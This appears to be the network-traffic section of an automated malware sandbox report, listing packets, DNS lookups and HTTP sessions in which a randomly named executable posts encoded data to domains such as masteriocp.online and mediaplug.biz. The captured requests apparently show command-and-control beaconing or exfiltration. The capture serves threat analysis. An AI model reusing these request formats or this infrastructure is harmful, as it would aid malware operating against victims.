Sep 16, 2024 14:10:16.115112066 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.973695993 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:16.973767042 CEST	49748	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:17.622633934 CEST	49748	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:17.627542973 CEST	80	49748	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:18.641495943 CEST	49749	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:18.646842957 CEST	80	49749	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:18.646939993 CEST	49749	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:18.654952049 CEST	49749	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:18.659833908 CEST	80	49749	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:19.512655973 CEST	80	49749	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:19.512948990 CEST	80	49749	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:19.513153076 CEST	49749	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:19.517219067 CEST	49749	80	192.168.2.4	103.42.108.46
Sep 16, 2024 14:10:19.522037983 CEST	80	49749	103.42.108.46	192.168.2.4
Sep 16, 2024 14:10:24.867506981 CEST	49750	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:24.872370005 CEST	80	49750	3.33.130.190	192.168.2.4
Sep 16, 2024 14:10:24.872435093 CEST	49750	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:24.886185884 CEST	49750	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:24.891016006 CEST	80	49750	3.33.130.190	192.168.2.4
Sep 16, 2024 14:10:25.330893040 CEST	80	49750	3.33.130.190	192.168.2.4
Sep 16, 2024 14:10:25.330976963 CEST	49750	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:26.388134003 CEST	49750	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:26.392976046 CEST	80	49750	3.33.130.190	192.168.2.4
Sep 16, 2024 14:10:27.750519037 CEST	49751	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:27.755542994 CEST	80	49751	3.33.130.190	192.168.2.4
Sep 16, 2024 14:10:27.755842924 CEST	49751	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:27.766313076 CEST	49751	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:27.772037029 CEST	80	49751	3.33.130.190	192.168.2.4
Sep 16, 2024 14:10:28.222729921 CEST	80	49751	3.33.130.190	192.168.2.4
Sep 16, 2024 14:10:28.222827911 CEST	49751	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:29.278836012 CEST	49751	80	192.168.2.4	3.33.130.190
Sep 16, 2024 14:10:29.283704996 CEST	80	49751	3.33.130.190	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 16, 2024 14:09:21.930486917 CEST	58572	53	192.168.2.4	1.1.1.1
Sep 16, 2024 14:09:21.961713076 CEST	53	58572	1.1.1.1	192.168.2.4
Sep 16, 2024 14:09:26.977065086 CEST	56697	53	192.168.2.4	1.1.1.1
Sep 16, 2024 14:09:26.991440058 CEST	53	56697	1.1.1.1	192.168.2.4
Sep 16, 2024 14:09:42.515921116 CEST	59588	53	192.168.2.4	1.1.1.1
Sep 16, 2024 14:09:42.966931105 CEST	53	59588	1.1.1.1	192.168.2.4
Sep 16, 2024 14:09:56.843908072 CEST	61047	53	192.168.2.4	1.1.1.1
Sep 16, 2024 14:09:57.097335100 CEST	53	61047	1.1.1.1	192.168.2.4
Sep 16, 2024 14:10:10.500201941 CEST	49586	53	192.168.2.4	1.1.1.1
Sep 16, 2024 14:10:11.008960009 CEST	53	49586	1.1.1.1	192.168.2.4
Sep 16, 2024 14:10:24.532192945 CEST	49229	53	192.168.2.4	1.1.1.1
Sep 16, 2024 14:10:24.843424082 CEST	53	49229	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 16, 2024 14:09:21.930486917 CEST	192.168.2.4	1.1.1.1	0x2202	Standard query (0)	www.linkbasic.net	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:26.977065086 CEST	192.168.2.4	1.1.1.1	0x3865	Standard query (0)	www.chamadaslotgiris.net	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:42.515921116 CEST	192.168.2.4	1.1.1.1	0xd99b	Standard query (0)	www.masteriocp.online	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:56.843908072 CEST	192.168.2.4	1.1.1.1	0xd283	Standard query (0)	www.mediaplug.biz	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:10:10.500201941 CEST	192.168.2.4	1.1.1.1	0x2f42	Standard query (0)	www.independent200.org	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:10:24.532192945 CEST	192.168.2.4	1.1.1.1	0xed6	Standard query (0)	www.tigre777gg.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 16, 2024 14:09:21.961713076 CEST	1.1.1.1	192.168.2.4	0x2202	Name error (3)	www.linkbasic.net	none	none	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:26.991440058 CEST	1.1.1.1	192.168.2.4	0x3865	No error (0)	www.chamadaslotgiris.net	chamadaslotgiris.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 16, 2024 14:09:26.991440058 CEST	1.1.1.1	192.168.2.4	0x3865	No error (0)	chamadaslotgiris.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:26.991440058 CEST	1.1.1.1	192.168.2.4	0x3865	No error (0)	chamadaslotgiris.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:42.966931105 CEST	1.1.1.1	192.168.2.4	0xd99b	No error (0)	www.masteriocp.online	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 16, 2024 14:09:42.966931105 CEST	1.1.1.1	192.168.2.4	0xd99b	No error (0)	dns.ladipage.com		13.228.81.39	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:42.966931105 CEST	1.1.1.1	192.168.2.4	0xd99b	No error (0)	dns.ladipage.com		54.179.173.60	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:42.966931105 CEST	1.1.1.1	192.168.2.4	0xd99b	No error (0)	dns.ladipage.com		18.139.62.226	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:57.097335100 CEST	1.1.1.1	192.168.2.4	0xd283	No error (0)	www.mediaplug.biz		66.81.203.135	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:57.097335100 CEST	1.1.1.1	192.168.2.4	0xd283	No error (0)	www.mediaplug.biz		66.81.203.200	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:09:57.097335100 CEST	1.1.1.1	192.168.2.4	0xd283	No error (0)	www.mediaplug.biz		66.81.203.10	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:10:11.008960009 CEST	1.1.1.1	192.168.2.4	0x2f42	No error (0)	www.independent200.org		103.42.108.46	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:10:24.843424082 CEST	1.1.1.1	192.168.2.4	0xed6	No error (0)	www.tigre777gg.online	tigre777gg.online		CNAME (Canonical name)	IN (0x0001)	false
Sep 16, 2024 14:10:24.843424082 CEST	1.1.1.1	192.168.2.4	0xed6	No error (0)	tigre777gg.online		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 16, 2024 14:10:24.843424082 CEST	1.1.1.1	192.168.2.4	0xed6	No error (0)	tigre777gg.online		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.chamadaslotgiris.net

www.masteriocp.online

www.mediaplug.biz

www.independent200.org

www.tigre777gg.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	3.33.130.190	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:09:27.011771917 CEST	518	OUT	GET /gqyt/?3vHty=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&fx=kLn8bpp8IVh HTTP/1.1 Host: www.chamadaslotgiris.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 16, 2024 14:09:27.475565910 CEST	396	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 16 Sep 2024 12:09:27 GMT Content-Type: text/html Content-Length: 256 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 76 48 74 79 3d 4e 5a 65 53 70 2f 4d 38 42 6b 49 4c 44 6d 78 73 32 42 37 68 49 6c 58 62 70 56 74 43 6d 45 58 52 47 69 66 7a 30 2f 74 6d 56 69 32 62 31 6f 56 4f 35 4e 65 48 65 4c 32 75 6c 7a 4f 6e 66 34 49 79 32 63 74 6a 45 76 53 38 33 34 77 30 35 67 4d 73 36 4d 51 79 69 48 4e 48 37 44 50 6c 6f 4c 66 53 6e 47 6c 6c 43 78 79 35 30 44 44 2f 74 4f 6e 2f 6e 69 4c 73 78 49 6b 3d 26 66 78 3d 6b 4c 6e 38 62 70 70 38 49 56 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3vHty=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&fx=kLn8bpp8IVh"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	13.228.81.39	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:09:42.982590914 CEST	790	OUT	POST /p5rq/ HTTP/1.1 Host: www.masteriocp.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.masteriocp.online Referer: http://www.masteriocp.online/p5rq/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 7a 67 70 6e 4e 70 74 51 59 2b 33 76 79 50 2b 33 77 41 68 36 44 78 45 70 6d 5a 61 69 36 2b 53 6f 67 3d 3d Data Ascii: 3vHty=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uzgpnNptQY+3vyP+3wAh6DxEpmZai6+Sog==
Sep 16, 2024 14:09:44.001677990 CEST	368	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Mon, 16 Sep 2024 12:09:43 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.masteriocp.online/p5rq/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	13.228.81.39	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:09:45.531703949 CEST	810	OUT	POST /p5rq/ HTTP/1.1 Host: www.masteriocp.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.masteriocp.online Referer: http://www.masteriocp.online/p5rq/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 6c 33 76 61 38 74 69 75 75 61 74 68 4a 79 67 67 52 48 76 72 4a 6f 7a 47 6d 45 4d 50 57 55 54 66 4e 6e 78 59 61 2f 64 70 63 35 55 57 30 59 51 53 46 35 4c 76 64 2b 76 38 4e 6b 6d 48 49 33 4f 45 6c 32 48 36 75 54 75 5a 64 71 75 46 53 6e 6d 6c 46 56 2f 4a 2b 61 73 5a 71 64 54 74 49 6b 66 76 5a 38 61 34 47 6e 2f 71 47 42 62 38 73 50 33 4d 31 48 4f 6c 32 67 32 78 56 2b 34 76 70 63 5a 39 61 58 6a 55 65 6b 6d 42 68 32 6f 44 56 33 30 68 51 75 76 35 44 62 7a 6e 77 52 56 41 71 6a 71 36 69 79 31 75 37 51 2f 4d 68 6a 54 78 30 3d Data Ascii: 3vHty=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHl3va8tiuuathJyggRHvrJozGmEMPWUTfNnxYa/dpc5UW0YQSF5Lvd+v8NkmHI3OEl2H6uTuZdquFSnmlFV/J+asZqdTtIkfvZ8a4Gn/qGBb8sP3M1HOl2g2xV+4vpcZ9aXjUekmBh2oDV30hQuv5DbznwRVAqjq6iy1u7Q/MhjTx0=
Sep 16, 2024 14:09:46.444582939 CEST	368	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Mon, 16 Sep 2024 12:09:46 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.masteriocp.online/p5rq/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	13.228.81.39	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:09:48.319118977 CEST	9888	OUT	POST /p5rq/ HTTP/1.1 Host: www.masteriocp.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.masteriocp.online Referer: http://www.masteriocp.online/p5rq/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 74 33 76 73 6f 74 77 5a 61 61 2f 78 4a 79 74 41 52 43 76 72 49 36 7a 48 4f 36 4d 50 4c 6a 54 63 31 6e 7a 36 69 2f 59 63 6f 35 44 47 30 59 50 43 46 34 45 50 64 72 76 39 68 37 6d 48 59 33 4f 45 6c 32 48 37 65 54 6e 74 42 71 69 6c 53 6b 79 31 46 6a 37 4a 2b 79 73 5a 7a 6f 54 74 45 30 66 38 52 38 61 59 57 6e 39 59 2b 42 58 38 73 33 77 4d 30 43 4f 6c 36 46 32 78 4a 79 34 75 4e 36 5a 37 6d 58 31 7a 37 74 69 68 68 68 79 43 6c 6f 68 77 6b 61 6f 6f 6a 57 79 30 38 49 44 51 4b 74 35 4f 71 75 37 35 71 59 74 35 39 59 4f 58 77 33 30 65 41 41 72 74 77 64 35 58 62 63 7a 47 74 6f 77 32 74 43 61 42 77 34 68 75 46 41 69 37 59 74 64 61 6a 4a 71 55 68 38 4c 4e 6c 6a 75 62 72 37 6a 47 36 38 46 70 70 34 49 6a 43 55 5a 6a 79 30 73 35 44 53 68 64 6d 44 5a 75 78 6f 6c 4e 79 63 57 74 33 6c 44 58 61 37 78 45 41 37 48 4c 38 41 51 52 34 4d 46 41 39 7a 39 43 6b 69 67 53 68 36 73 64 79 4c [TRUNCATED] Data Ascii: 3vHty=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHt3vsotwZaa/xJytARCvrI6zHO6MPLjTc1nz6i/Yco5DG0YPCF4EPdrv9h7mHY3OEl2H7eTntBqilSky1Fj7J+ysZzoTtE0f8R8aYWn9Y+BX8s3wM0COl6F2xJy4uN6Z7mX1z7tihhhyClohwkaoojWy08IDQKt5Oqu75qYt59YOXw30eAArtwd5XbczGtow2tCaBw4huFAi7YtdajJqUh8LNljubr7jG68Fpp4IjCUZjy0s5DShdmDZuxolNycWt3lDXa7xEA7HL8AQR4MFA9z9CkigSh6sdyL0hdLM2dWq8KiWCgfGaeuDMM9KICz408wRW3YaHDL7027gUs+Qa87Aax4bp4CyVrLY34wgyrR901lukpkHhRewEJBb55btdCuHI7UIrmDWzhHtx7Q0iXm+Bm16DjXCuP0n/g6meH0taHnd2gW+0H8G9TDGC/yi7R3Ltgs/EIy32+JJwAP9j230V+rseZyQiCYSlUGvu0rAETaDqk3G68UCanGpRkcQOf3dTnq7vAAIzb0tW91Bnsh/JC0/1OTRO80cXGkmXSoOIR+N+cebnDCpMCpbcj4ZLOVI4GCaU2KzSm+dr3ZIsL3okvouLJx7XsYeo0qacxXis2uOsj9ZJipoie/6YPG8TPXp5dk2xOwFZFV38/PxI07d6RwWiXFT4oXsXaY+WHK4yDfk+tdA6xZKcLI89F8rMrzN0PxHNW9CtPdPNRxK2nDJcfN15bxgeB9kCilrd+fJiIZe0SoeRfotaP/vyZK86z23KWrA5UhUYksrrdM9JD0ZGs4odBy3kTUSUXfU36arI8cwXhLchNA/X/4BcT3RvZUGfMQqNPsoiu3RSRAtxWoV6caoB1uF8/Dpf04lac0Q1dvIT0VzMMnCmUGEAav8Tp/l/0bN2r6cZ7o6iAuO1/SGtV3Hv5/8T3Q/3o2sjMpmJ4H0Lx7VUG7SbcFj7QkQv8qdV [TRUNCATED]
Sep 16, 2024 14:09:48.319147110 CEST	1004	OUT	Data Raw: 52 67 35 6f 57 57 31 4f 47 6f 6b 64 46 57 70 53 77 72 2f 41 61 7a 50 6e 38 71 50 69 37 39 5a 7a 49 2b 31 35 4d 47 39 71 72 49 33 35 4a 77 63 48 4e 57 30 58 2f 6e 52 6d 62 6b 69 30 48 74 6d 6a 6f 51 32 33 4c 48 5a 6f 49 56 4f 32 44 50 55 6e 64 52 Data Ascii: Rg5oWW1OGokdFWpSwr/AazPn8qPi79ZzI+15MG9qrI35JwcHNW0X/nRmbki0HtmjoQ23LHZoIVO2DPUndRUcQiE6R/slc1qg+3IchT9vBhPZGar+WvSL/oKaPrxFtHD1ffZRSNg9BPWa6x2X7v4rCUQczygO9KSTFbGCqb8kq4Qqho3+M6V7nSPHRviC1ddWGjN1kBfqx8LPitnVrFLhYFFVU44MpaJqBYHIgFj4RVVt6Vp6Ax6
Sep 16, 2024 14:09:49.261487961 CEST	368	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Mon, 16 Sep 2024 12:09:49 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.masteriocp.online/p5rq/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	13.228.81.39	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:09:50.855022907 CEST	515	OUT	GET /p5rq/?3vHty=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&fx=kLn8bpp8IVh HTTP/1.1 Host: www.masteriocp.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 16, 2024 14:09:51.823002100 CEST	510	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Mon, 16 Sep 2024 12:09:51 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.masteriocp.online/p5rq/?3vHty=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&fx=kLn8bpp8IVh Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	66.81.203.135	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:09:57.115313053 CEST	778	OUT	POST /osde/ HTTP/1.1 Host: www.mediaplug.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.mediaplug.biz Referer: http://www.mediaplug.biz/osde/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 73 72 49 58 4a 63 53 63 6b 68 56 48 75 4f 74 6e 34 44 77 38 33 36 4f 79 4a 38 70 5a 6e 39 65 57 7a 70 54 2f 65 35 41 39 78 6e 46 30 50 56 66 56 51 47 62 39 45 45 6c 49 50 66 6c 5a 5a 48 68 63 7a 34 4c 4c 35 63 70 62 49 47 47 63 45 69 6a 37 6b 41 46 46 52 49 55 32 76 43 33 48 77 6b 42 43 6d 38 72 6d 34 48 76 47 37 4e 2f 51 30 61 4d 68 67 38 62 30 72 6b 58 63 66 41 43 41 78 6c 61 4d 72 32 64 63 7a 54 5a 4b 37 72 46 47 64 6c 38 4f 51 35 66 6a 4f 48 69 61 74 5a 61 64 58 32 4a 2f 41 36 76 6f 55 4a 2b 38 4f 2f 62 50 43 68 32 2f 64 30 56 61 4b 51 3d 3d Data Ascii: 3vHty=cUZt2z1pvMaysrIXJcSckhVHuOtn4Dw836OyJ8pZn9eWzpT/e5A9xnF0PVfVQGb9EElIPflZZHhcz4LL5cpbIGGcEij7kAFFRIU2vC3HwkBCm8rm4HvG7N/Q0aMhg8b0rkXcfACAxlaMr2dczTZK7rFGdl8OQ5fjOHiatZadX2J/A6voUJ+8O/bPCh2/d0VaKQ==
